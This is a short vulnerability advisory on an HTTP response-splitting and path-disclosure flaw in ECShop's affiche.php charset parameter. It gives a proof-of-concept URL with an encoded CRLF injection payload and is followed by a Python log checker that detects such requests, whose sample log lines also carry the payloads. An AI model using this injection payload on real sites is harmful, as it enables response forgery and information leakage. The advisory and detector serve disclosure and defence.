ECShop latest path-disclosure 0day - vulnerability warning - the black bar safety net

2010-09-14T00:00:00
ID MYHACK58:62201027860
Type myhack58
Reporter Anonymous
Modified 2010-09-14T00:00:00

Description

Brief description: /affiche.php: in a PHP5 environment an error message exposes the program path; in a PHP4 environment the written content is displayed.

Detailed description: the charset parameter is not strictly filtered, so the HTTP response header can be truncated and request-supplied content written after it.

Proof of vulnerability: http://www.myhack58.com/ecshop/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A
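
Detection example (added here, not part of the original advisory and not ECShop code): a log check that flags requests whose query parameters decode to CR or LF, the condition the charset parameter above fails to filter. It goes beyond the advisory by checking every parameter and by unwrapping double percent-encoding; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Sep/2010:10:00:01 +0800] "GET /ecshop/affiche.php?act=js&type=3&ad_id=1&charset=GBK HTTP/1.1" 200 312',
    '192.0.2.44 - - [14/Sep/2010:10:02:17 +0800] "GET /ecshop/affiche.php?act=js&type=3&ad_id=1&charset=GBK%0D%0AX-Test:%201 HTTP/1.1" 200 0',
    '192.0.2.44 - - [14/Sep/2010:10:02:19 +0800] "GET /ecshop/affiche.php?act=js&charset=GBK%250d%250aX-Test:%201 HTTP/1.1" 200 0',
    '192.0.2.71 - - [14/Sep/2010:10:05:40 +0800] "GET /ecshop/index.php?keywords=a%20b HTTP/1.1" 200 5120',
]

# client, ident, user, [timestamp], "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded %250D is also revealed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_crlf_params(lines):
    """Return (client, path, param) for each query parameter carrying CR or LF."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, _method, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl already decodes once; fully_decode handles nested encoding.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if any(c in fully_decode(value) for c in "\r\n"):
                hits.append((client, parts.path, name))
    return hits


if __name__ == "__main__":
    for hit in find_crlf_params(SAMPLE_LOG):
        print(hit)
```
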